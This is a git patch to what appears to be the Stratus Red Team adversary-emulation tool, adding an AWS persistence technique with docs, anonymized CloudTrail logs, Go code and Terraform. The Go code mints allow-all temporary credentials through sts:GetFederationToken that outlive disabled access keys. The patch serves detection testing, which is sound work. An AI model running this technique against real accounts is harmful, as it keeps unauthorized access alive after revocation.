From d57c50875d9853932dcdc5dc35120b7fa6e968b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Adan=20=C3=81lvarez?= Date: Wed, 4 Dec 2024 16:28:28 +0100 Subject: [PATCH] New attack technique: Persistence through federation (#604) * add persistence sts federation token technique * add documentation for sts federation token technique * Cosmetic changes + logging improvements * Add delay for eventual consistency * terraform fmt --------- Co-authored-by: Christophe Tafani-Dereeper --- .../aws.persistence.sts-federation-token.md | 158 ++++++++++++++++++ docs/attack-techniques/AWS/index.md | 2 + docs/attack-techniques/list.md | 1 + .../aws.persistence.sts-federation-token.json | 91 ++++++++++ docs/index.yaml | 7 + .../persistence/sts-federation-token/main.go | 121 ++++++++++++++ .../persistence/sts-federation-token/main.tf | 76 +++++++++ v2/internal/attacktechniques/main.go | 1 + 8 files changed, 457 insertions(+) create mode 100755 docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md create mode 100644 docs/detonation-logs/aws.persistence.sts-federation-token.json create mode 100644 v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go create mode 100644 v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf diff --git a/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md b/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md new file mode 100755 index 00000000..91c80782 --- /dev/null +++ b/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md @@ -0,0 +1,158 @@ +--- +title: Generate temporary AWS credentials using GetFederationToken +--- + +# Generate temporary AWS credentials using GetFederationToken + + + idempotent + +Platform: AWS + +## MITRE ATT&CK Tactics + + +- Persistence + +## Description + + +Establishes persistence by generating new AWS temporary credentials through sts:GetFederationToken. The resulting credentials remain functional even if the original access keys are disabled. + +Warm-up: + +- Create an IAM user and generate a pair of access keys. + +Detonation: + +- Use the access keys from the IAM user to request temporary security credentials via sts:GetFederationToken. +- Call sts:GetCallerIdentity using these new credentials. + +References: + +- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html +- https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/ +- https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf +- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf + + +## Instructions + +```bash title="Detonate with Stratus Red Team" +stratus detonate aws.persistence.sts-federation-token +``` +## Detection + + +Through CloudTrail's GetFederationToken event. + + + +## Detonation logs new! + +The following CloudTrail events are generated when this technique is detonated[^1]: + + +- `sts:GetCallerIdentity` + +- `sts:GetFederationToken` + + +??? "View raw detonation logs" + + ```json hl_lines="6 51" + + [ + { + "awsRegion": "ap-isob-east-1r", + "eventCategory": "Management", + "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70", + "eventName": "GetFederationToken", + "eventSource": "sts.amazonaws.com", + "eventTime": "2024-11-30T08:43:17Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "742491224508", + "requestID": "e2de7fd1-2a86-4837-b15a-96fff1388061", + "requestParameters": { + "name": "stratus_red_team", + "policy": "{\n\t\t\"Version\": \"2012-10-17\",\n\t\t\"Statement\": [\n\t\t\t{\n\t\t\t\t\"Effect\": \"Allow\",\n\t\t\t\t\"Action\": \"*\",\n\t\t\t\t\"Resource\": \"*\"\n\t\t\t}\n\t\t]\n\t}" + }, + "responseElements": { + "credentials": { + "accessKeyId": "ASIASTJKC5GCM7ZE6LUP", + "expiration": "Nov 30, 2024, 8:43:17 PM", + "sessionToken": "IQoJb3JpZ2luX2VjEOH//////////wEaCXVzLWVhc3QtMSJIMEYCIQDzpomGZAmkp4RIzBo4RqVJGEmUNjyA7lHyt1aKfFh8IwIhANX6aS3XpNU319gOolVjEBkNLRmu9dyO8FqoDW5y+HL4KqICCIr//////////wEQABoMMzQ1NTk0NjA3OTQ5IgykqzjqIZ5pQXZgeDEq9gGg9Law7M5zzj/fSvNlo2pgdgHCmA6UW8IevbwXiKbLO5y0dg/sdhsaEUaOvl6i2Fu+xF2p3dvI8SuCJSTH5PEC2ZRgX1TPhzh+0xN7CsCQG2diBitgDQSs+E3P9ED4xDVuTCE9H8IIS/2BuksBI9bQ3z2itKRkVmkC+xpsfyFc98vX0ZLSUKOIpx+iaDNrhiW85Cyt6ezNEyLfX3bukmmIdVIZQ+Tb4tYLvIRKIyp6OFiA3BL48K7nfIAd1EzDhGnlvkZN/70hDxYt8hTKehNXDs2FVKY5u96z0zhsnNGcuhHHa7OEOKg5lLL5QuEzjx6JA+e9qaQwpaCrugY6mAFp1LZ4E15PVqImPSC/wtr+rEU4Dnp+1/6+PNkbxvxYXfqZOfJxRkZtgWtmV7iWapGzA/pVedD4vuHci4Kq2NUTuyA8L7BeKSaEq0FqFi1yrfCYjYsGI3ncxMQQddgiXVXeoWY4c4auGvAHgiJI/PDQPsaa3Sle/gGnok53u8NfNYoBRtASGaJJtGS0ylDxsQVe9InwBxoJnQ==" + }, + "federatedUser": { + "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team", + "federatedUserId": "742491224508:stratus_red_team" + }, + "packedPolicySize": 4 + }, + "sourceIPAddress": "255.090.254.5", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2", + "userIdentity": { + "accessKeyId": "AKIA6V1GNZTT65XQH36M", + "accountId": "742491224508", + "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user", + "principalId": "AIDAN7SEM6PEVTNQR8M4", + "type": "IAMUser", + "userName": "stratus-red-team-user-federation-user" + } + }, + { + "awsRegion": "ap-isob-east-1r", + "eventCategory": "Management", + "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19", + "eventName": "GetCallerIdentity", + "eventSource": "sts.amazonaws.com", + "eventTime": "2024-11-30T08:43:18Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": true, + "recipientAccountId": "742491224508", + "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65", + "requestParameters": null, + "responseElements": null, + "sourceIPAddress": "255.090.254.5", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2", + "userIdentity": { + "accessKeyId": "ASIASTJKC5GCM7ZE6LUP", + "accountId": "742491224508", + "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team", + "principalId": "742491224508:stratus_red_team", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-30T08:43:17Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "742491224508", + "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user", + "principalId": "AIDAN7SEM6PEVTNQR8M4", + "type": "IAMUser", + "userName": "stratus-red-team-user-federation-user" + }, + "webIdFederationData": {} + }, + "type": "FederatedUser" + } + } + ] + ``` + +[^1]: These logs have been gathered from a real detonation of this technique in a test environment using [Grimoire](https://github.com/DataDog/grimoire), and anonymized using [LogLicker](https://github.com/Permiso-io-tools/LogLicker). diff --git a/docs/attack-techniques/AWS/index.md b/docs/attack-techniques/AWS/index.md index 5145dee1..de1861a9 100755 --- a/docs/attack-techniques/AWS/index.md +++ b/docs/attack-techniques/AWS/index.md @@ -110,6 +110,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT - [Create an IAM Roles Anywhere trust anchor](./aws.persistence.rolesanywhere-create-trust-anchor.md) +- [Generate temporary AWS credentials using GetFederationToken](./aws.persistence.sts-federation-token.md) + ## Privilege Escalation diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md index 40d1f63e..4963a9e7 100755 --- a/docs/attack-techniques/list.md +++ b/docs/attack-techniques/list.md @@ -49,6 +49,7 @@ This page contains the list of all Stratus Attack Techniques. | [Add a Malicious Lambda Extension](./AWS/aws.persistence.lambda-layer-extension.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation | | [Overwrite Lambda Function Code](./AWS/aws.persistence.lambda-overwrite-code.md) | [AWS](./AWS/index.md) | Persistence | | [Create an IAM Roles Anywhere trust anchor](./AWS/aws.persistence.rolesanywhere-create-trust-anchor.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation | +| [Generate temporary AWS credentials using GetFederationToken](./AWS/aws.persistence.sts-federation-token.md) | [AWS](./AWS/index.md) | Persistence | | [Change IAM user password](./AWS/aws.privilege-escalation.iam-update-user-login-profile.md) | [AWS](./AWS/index.md) | Privilege Escalation | | [Execute Command on Virtual Machine using Custom Script Extension](./azure/azure.execution.vm-custom-script-extension.md) | [Azure](./azure/index.md) | Execution | | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution | diff --git a/docs/detonation-logs/aws.persistence.sts-federation-token.json b/docs/detonation-logs/aws.persistence.sts-federation-token.json new file mode 100644 index 00000000..eb1f061a --- /dev/null +++ b/docs/detonation-logs/aws.persistence.sts-federation-token.json @@ -0,0 +1,91 @@ +[ + { + "awsRegion": "ap-isob-east-1r", + "eventCategory": "Management", + "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70", + "eventName": "GetFederationToken", + "eventSource": "sts.amazonaws.com", + "eventTime": "2024-11-30T08:43:17Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": false, + "recipientAccountId": "742491224508", + "requestID": "e2de7fd1-2a86-4837-b15a-96fff1388061", + "requestParameters": { + "name": "stratus_red_team", + "policy": "{\n\t\t\"Version\": \"2012-10-17\",\n\t\t\"Statement\": [\n\t\t\t{\n\t\t\t\t\"Effect\": \"Allow\",\n\t\t\t\t\"Action\": \"*\",\n\t\t\t\t\"Resource\": \"*\"\n\t\t\t}\n\t\t]\n\t}" + }, + "responseElements": { + "credentials": { + "accessKeyId": "ASIASTJKC5GCM7ZE6LUP", + "expiration": "Nov 30, 2024, 8:43:17 PM", + "sessionToken": "IQoJb3JpZ2luX2VjEOH//////////wEaCXVzLWVhc3QtMSJIMEYCIQDzpomGZAmkp4RIzBo4RqVJGEmUNjyA7lHyt1aKfFh8IwIhANX6aS3XpNU319gOolVjEBkNLRmu9dyO8FqoDW5y+HL4KqICCIr//////////wEQABoMMzQ1NTk0NjA3OTQ5IgykqzjqIZ5pQXZgeDEq9gGg9Law7M5zzj/fSvNlo2pgdgHCmA6UW8IevbwXiKbLO5y0dg/sdhsaEUaOvl6i2Fu+xF2p3dvI8SuCJSTH5PEC2ZRgX1TPhzh+0xN7CsCQG2diBitgDQSs+E3P9ED4xDVuTCE9H8IIS/2BuksBI9bQ3z2itKRkVmkC+xpsfyFc98vX0ZLSUKOIpx+iaDNrhiW85Cyt6ezNEyLfX3bukmmIdVIZQ+Tb4tYLvIRKIyp6OFiA3BL48K7nfIAd1EzDhGnlvkZN/70hDxYt8hTKehNXDs2FVKY5u96z0zhsnNGcuhHHa7OEOKg5lLL5QuEzjx6JA+e9qaQwpaCrugY6mAFp1LZ4E15PVqImPSC/wtr+rEU4Dnp+1/6+PNkbxvxYXfqZOfJxRkZtgWtmV7iWapGzA/pVedD4vuHci4Kq2NUTuyA8L7BeKSaEq0FqFi1yrfCYjYsGI3ncxMQQddgiXVXeoWY4c4auGvAHgiJI/PDQPsaa3Sle/gGnok53u8NfNYoBRtASGaJJtGS0ylDxsQVe9InwBxoJnQ==" + }, + "federatedUser": { + "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team", + "federatedUserId": "742491224508:stratus_red_team" + }, + "packedPolicySize": 4 + }, + "sourceIPAddress": "255.090.254.5", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2", + "userIdentity": { + "accessKeyId": "AKIA6V1GNZTT65XQH36M", + "accountId": "742491224508", + "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user", + "principalId": "AIDAN7SEM6PEVTNQR8M4", + "type": "IAMUser", + "userName": "stratus-red-team-user-federation-user" + } + }, + { + "awsRegion": "ap-isob-east-1r", + "eventCategory": "Management", + "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19", + "eventName": "GetCallerIdentity", + "eventSource": "sts.amazonaws.com", + "eventTime": "2024-11-30T08:43:18Z", + "eventType": "AwsApiCall", + "eventVersion": "1.08", + "managementEvent": true, + "readOnly": true, + "recipientAccountId": "742491224508", + "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65", + "requestParameters": null, + "responseElements": null, + "sourceIPAddress": "255.090.254.5", + "tlsDetails": { + "cipherSuite": "TLS_AES_128_GCM_SHA256", + "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com", + "tlsVersion": "TLSv1.3" + }, + "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2", + "userIdentity": { + "accessKeyId": "ASIASTJKC5GCM7ZE6LUP", + "accountId": "742491224508", + "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team", + "principalId": "742491224508:stratus_red_team", + "sessionContext": { + "attributes": { + "creationDate": "2024-11-30T08:43:17Z", + "mfaAuthenticated": "false" + }, + "sessionIssuer": { + "accountId": "742491224508", + "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user", + "principalId": "AIDAN7SEM6PEVTNQR8M4", + "type": "IAMUser", + "userName": "stratus-red-team-user-federation-user" + }, + "webIdFederationData": {} + }, + "type": "FederatedUser" + } + } +] \ No newline at end of file diff --git a/docs/index.yaml b/docs/index.yaml index 5779854d..c3cef353 100644 --- a/docs/index.yaml +++ b/docs/index.yaml @@ -294,6 +294,13 @@ AWS: - Privilege Escalation platform: AWS isIdempotent: false + - id: aws.persistence.sts-federation-token + name: Generate temporary AWS credentials using GetFederationToken + isSlow: false + mitreAttackTactics: + - Persistence + platform: AWS + isIdempotent: true Privilege Escalation: - id: aws.execution.ec2-user-data name: Execute Commands on EC2 Instance via User Data diff --git a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go new file mode 100644 index 00000000..ca441579 --- /dev/null +++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go @@ -0,0 +1,121 @@ +package aws + +import ( + "context" + _ "embed" + "fmt" + "github.com/aws/aws-sdk-go-v2/aws" + "github.com/aws/aws-sdk-go-v2/service/sts" + "github.com/datadog/stratus-red-team/v2/internal/utils" + "github.com/datadog/stratus-red-team/v2/pkg/stratus" + "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack" + "log" + "math" + "time" +) + +//go:embed main.tf +var tf []byte + +func init() { + stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{ + ID: "aws.persistence.sts-federation-token", + FriendlyName: "Generate temporary AWS credentials using GetFederationToken", + Description: ` +Establishes persistence by generating new AWS temporary credentials through sts:GetFederationToken. The resulting credentials remain functional even if the original access keys are disabled. + +Warm-up: + +- Create an IAM user and generate a pair of access keys. + +Detonation: + +- Use the access keys from the IAM user to request temporary security credentials via sts:GetFederationToken. +- Call sts:GetCallerIdentity using these new credentials. + +References: + +- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html +- https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/ +- https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf +- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf +`, + Detection: ` +Through CloudTrail's GetFederationToken event. +`, + Platform: stratus.AWS, + IsIdempotent: true, + MitreAttackTactics: []mitreattack.Tactic{mitreattack.Persistence}, + PrerequisitesTerraformCode: tf, + Detonate: detonate, + }) +} + +const SessionPolicyAllowAll = `{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "*", + "Resource": "*" + } + ] + }` + +const MinDelayBeforeCallingGetFederationToken = 10 * time.Second + +func detonate(params map[string]string, providers stratus.CloudProviders) error { + username := params["user_name"] + accessKeyID := params["access_key_id"] + secretAccessKey := params["secret_access_key"] + + ensureEventualConsistency(params) + + awsConfig := utils.AwsConfigFromCredentials(accessKeyID, secretAccessKey, "", &providers.AWS().UniqueCorrelationId) + stsClient := sts.NewFromConfig(awsConfig) + log.Println("Calling sts:GetFederationToken to generate temporary credentials") + federationTokenResult, err := stsClient.GetFederationToken(context.Background(), &sts.GetFederationTokenInput{ + Name: aws.String("stratus-red-team"), // Note: This can be anything and is unrelated to the underlying IAM username + Policy: aws.String(SessionPolicyAllowAll), + }) + if err != nil { + return fmt.Errorf("error getting federation token: %v", err) + } + + log.Println("Successfully obtained federated credentials for user " + username) + tempCredentials := *federationTokenResult.Credentials + tempCredentialsConfig := utils.AwsConfigFromCredentials( + *tempCredentials.AccessKeyId, + *tempCredentials.SecretAccessKey, + *tempCredentials.SessionToken, + &providers.AWS().UniqueCorrelationId, + ) + federatedStsClient := sts.NewFromConfig(tempCredentialsConfig) + + log.Println("Calling sts:GetCallerIdentity with the newly-acquired federated credentials") + federatedCallerIdentity, err := federatedStsClient.GetCallerIdentity(context.Background(), &sts.GetCallerIdentityInput{}) + if err != nil { + return fmt.Errorf("error getting caller identity with federated credentials: %v", err) + } + log.Println("Result:", *federatedCallerIdentity.Arn) + log.Println(`Here are the credentials below. Notice how they remain valid even if you disable the original access keys! + +export AWS_ACCESS_KEY_ID="` + *tempCredentials.AccessKeyId + `" +export AWS_SECRET_ACCESS_KEY="` + *tempCredentials.SecretAccessKey + `" +export AWS_SESSION_TOKEN="` + *tempCredentials.SessionToken + `" +`) + return nil +} + +func ensureEventualConsistency(params map[string]string) { + // Due to eventual consistency, we need to make sure at least a few seconds passed between when the access key is + // created and when we call GetFederationToken + createDate, _ := time.Parse(time.RFC3339, params["access_key_create_date"]) + createdSecondsAgo := time.Since(createDate) + if createdSecondsAgo < MinDelayBeforeCallingGetFederationToken { + sleepTime := MinDelayBeforeCallingGetFederationToken - createdSecondsAgo + // print sleep time with 2 digits of precision + log.Printf("Waiting for %f seconds before calling GetFederationToken due to eventual consistency", math.Round(sleepTime.Seconds()*100)/100) + time.Sleep(sleepTime) + } +} diff --git a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf new file mode 100644 index 00000000..9664c8b1 --- /dev/null +++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf @@ -0,0 +1,76 @@ +terraform { + required_providers { + aws = { + source = "hashicorp/aws" + version = "~> 3.0" + } + } +} +provider "aws" { + skip_region_validation = true + skip_credentials_validation = true + skip_get_ec2_platforms = true + default_tags { + tags = { + StratusRedTeam = true + } + } +} + +locals { + resource_prefix = "stratus-red-team-user-federation" +} + +resource "aws_iam_user" "legit-user" { + name = "${local.resource_prefix}-user" + force_destroy = true +} + +data "aws_iam_policy_document" "legit-user-policy-document" { + statement { + effect = "Allow" + actions = [ + "sts:GetFederationToken", + "iam:UpdateAccessKey", + "iam:ListAccessKeys" + ] + resources = ["*"] + } +} + +resource "aws_iam_user_policy" "legit-user-policy" { + name = "test" + user = aws_iam_user.legit-user.name + policy = data.aws_iam_policy_document.legit-user-policy-document.json +} + +resource "aws_iam_access_key" "inactive-credentials" { + user = aws_iam_user.legit-user.name + status = "Inactive" +} + +resource "aws_iam_access_key" "active-credentials" { + user = aws_iam_user.legit-user.name + status = "Active" +} + +output "user_name" { + value = aws_iam_user.legit-user.name +} + +output "access_key_id" { + value = aws_iam_access_key.active-credentials.id +} + +output "secret_access_key" { + value = aws_iam_access_key.active-credentials.secret + sensitive = true +} + +output "display" { + value = format("IAM user %s ready", aws_iam_user.legit-user.name) +} + +output "access_key_create_date" { + value = aws_iam_access_key.active-credentials.create_date +} \ No newline at end of file diff --git a/v2/internal/attacktechniques/main.go b/v2/internal/attacktechniques/main.go index be8acf48..1e9b2fc7 100644 --- a/v2/internal/attacktechniques/main.go +++ b/v2/internal/attacktechniques/main.go @@ -40,6 +40,7 @@ import ( _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-backdoor-function" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-layer-extension" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-overwrite-code" + _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/sts-federation-token" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/rolesanywhere-create-trust-anchor" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/privilege-escalation/change-iam-user-password" _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/execution/vm-custom-script-extension"